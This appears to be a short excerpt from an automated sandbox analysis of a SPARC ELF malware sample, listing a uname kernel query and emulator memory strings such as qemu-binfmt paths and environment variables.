Source: /tmp/GcOeQTPzrh.elf (PID: 6238) Queries kernel information via 'uname':

Binary or memory strings (the sample ran under qemu-sparc user-mode emulation; these strings belong to the emulator process, not to the SPARC binary itself)

Source: GcOeQTPzrh.elf, 6238.1.0000556eea687000.0000556eea70c000.rw-.sdmp, GcOeQTPzrh.elf, 6242.1.0000556eea687000.0000556eea70c000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/sparc
Source: GcOeQTPzrh.elf, 6238.1.0000556eea687000.0000556eea70c000.rw-.sdmp, GcOeQTPzrh.elf, 6242.1.0000556eea687000.0000556eea70c000.rw-.sdmp Binary or memory string: nU!/etc/qemu-binfmt/sparc
Source: GcOeQTPzrh.elf, 6238.1.00007ffc93fb1000.00007ffc93fd2000.rw-.sdmp, GcOeQTPzrh.elf, 6242.1.00007ffc93fb1000.00007ffc93fd2000.rw-.sdmp Binary or memory string: /usr/bin/qemu-sparc
Source: GcOeQTPzrh.elf, 6238.1.00007ffc93fb1000.00007ffc93fd2000.rw-.sdmp, GcOeQTPzrh.elf, 6242.1.00007ffc93fb1000.00007ffc93fd2000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-sparc/tmp/GcOeQTPzrh.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/GcOeQTPzrh.elf